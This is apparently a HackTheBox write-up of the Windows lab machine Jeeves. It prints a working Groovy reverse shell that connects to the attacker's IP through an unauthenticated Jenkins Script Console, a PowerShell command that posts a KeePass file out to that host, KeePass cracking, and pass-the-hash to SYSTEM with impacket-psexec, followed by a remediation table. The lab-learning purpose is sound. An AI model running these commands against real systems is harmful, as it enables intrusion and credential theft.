← Back to writeups

HackTheBox - Jeeves Writeup | Windows Medium

09 June 2026 HTB Medium
Jenkins RCEKeePass crackingPass-the-HashNTFS Alternate Data Streams

Introduction

Jeeves is a Windows machine that chains together several real-world attack techniques: an unauthenticated Jenkins Script Console providing code execution, a KeePass password database left on disk, and an NTFS Alternate Data Stream used to hide the final flag. Every step reflects scenarios encountered in penetration tests.

Attack Overview

Port 50000 (Jetty)

Fuzzing reveals /askjeeves

Jenkins dashboard (no authentication)

Script Console → Groovy RCE

Reverse shell as kohsuke (SeImpersonatePrivilege)

CEH.kdbx found in Documents

John the Ripper cracks master password "moonshine1"

NTLM hash extracted from KeePass

Pass-the-Hash (impacket-psexec)

NT AUTHORITY\SYSTEM

Root flag hidden in NTFS ADS

Initial Enumeration

A full port scan reveals four open ports:

PortServiceVersion
80/tcpHTTPMicrosoft IIS 10.0
135/tcpMSRPCWindows RPC
445/tcpSMBWindows 7–10
50000/tcpHTTPJetty 9.4.z-SNAPSHOT

Observations from the scan output:

  • SMB signing is disabled.
  • The machine name is JEEVES running Windows 10 Pro build 10586.
  • Port 50000 returns a 404 Not Found from a Jetty server.

Web Enumeration

Visiting http://10.129.228.112 shows an “Ask Jeeves” search engine parody page. Directory fuzzing finds only index.html and error.html. This page is a decoy.

Fuzzing port 50000 reveals a hidden path:

ffuf -u http://10.129.228.112:50000/FUZZ \
     -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -t 50

Result: /askjeeves returns a 302 redirect. Navigating to http://10.129.228.112:50000/askjeeves exposes a Jenkins dashboard with no authentication required.

Jenkins Script Console RCE

Jenkins provides a Script Console (/script) for administrators to run arbitrary Groovy code on the server. With no authentication, any visitor can execute OS commands.

A Groovy reverse shell is prepared:

String host="10.10.14.165";
int port=4443;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();po.flush();Thread.sleep(50);
    try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();s.close();

A listener is set up:

ncat -lvnp 4443

After clicking Run in Jenkins, a shell is received:

Ncat: Connection from 10.129.228.112:49676.
Microsoft Windows [Version 10.0.10586]
C:\Users\Administrator\.jenkins>

User Access

The user flag is retrieved:

cd C:\Users\kohsuke\Desktop
type user.txt
[redacted]

Post-Exploitation Enumeration

Checking privileges:

whoami /all

SeImpersonatePrivilege is enabled. Attempts with JuicyPotato and PrintSpoofer fail on this Windows build. The user’s Documents folder contains a KeePass database:

dir C:\Users\kohsuke\Documents
09/18/2017  01:43 PM             2,846 CEH.kdbx

KeePass Cracking

The file is transferred to the attacker machine:

powershell -c "Invoke-WebRequest -Uri 'http://10.10.14.165:8000/' -Method POST -InFile CEH.kdbx"

The KeePass master password hash is extracted and cracked:

keepass2john CEH.kdbx > keepass.hash
john --wordlist=/usr/share/wordlists/rockyou.txt keepass.hash

Output:

moonshine1       (CEH)

Opening the database reveals several entries, including one labeled “Backup stuff” containing an NTLM hash:

aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

Privilege Escalation with Pass-the-Hash

The NTLM hash is used to authenticate as Administrator without cracking it:

netexec smb 10.129.228.112 -u Administrator \
  -H aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

Output: [+] Jeeves\Administrator:e0fb1fb85756c24235ff238cbe81fe00 (Pwn3d!)

A SYSTEM shell is obtained using impacket-psexec:

impacket-psexec administrator@10.129.228.112 \
  -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
[*] Found writable share ADMIN$
[*] Uploading file uCXayOup.exe
[*] Creating service nDqH
[*] Starting service nDqH...
Microsoft Windows [Version 10.0.10586]
C:\Windows\system32>

Root Flag in NTFS Alternate Data Stream

The root flag is not a direct file on Administrator’s desktop. Using dir /r reveals hidden streams:

dir /a /r C:\Users\Administrator\Desktop

Output:

hm.txt                        36 hm.txt
                              34 hm.txt:root.txt:$DATA

The flag is read from the alternate data stream:

more < hm.txt:root.txt:$DATA
[redacted]

Key Takeaways

VulnerabilityRoot CauseRemediation
Jenkins exposed without authenticationScript Console accessible to unauthenticated usersEnforce authentication; restrict Script Console to administrators; never expose Jenkins internet-facing
KeePass database stored on disk with weak master passwordMaster password moonshine1 cracked via rockyou.txtUse strong, unique master passwords; restrict access to .kdbx files
NTLM hash stored in plaintext inside KeePassRaw hash stored as a password entryTreat NTLM hashes as sensitive as plaintext; avoid storing them in password managers without additional protection
Pass-the-Hash allowed remote SYSTEM accessNTLM authentication without SMB signingEnable SMB signing; disable NTLM where possible
Root flag hidden in NTFS ADSLack of visibility into alternate data streamsUse dir /r during incident response; monitor for ADS creation

Resources

  • Nmap — Network discovery and port scanning
  • ffuf — Web directory fuzzing tool
  • John the Ripper — Password hash cracking
  • keepass2john — Extract KeePass master password hash
  • netexec — SMB authentication testing
  • Impacket — Network protocols toolkit (psexec implementation)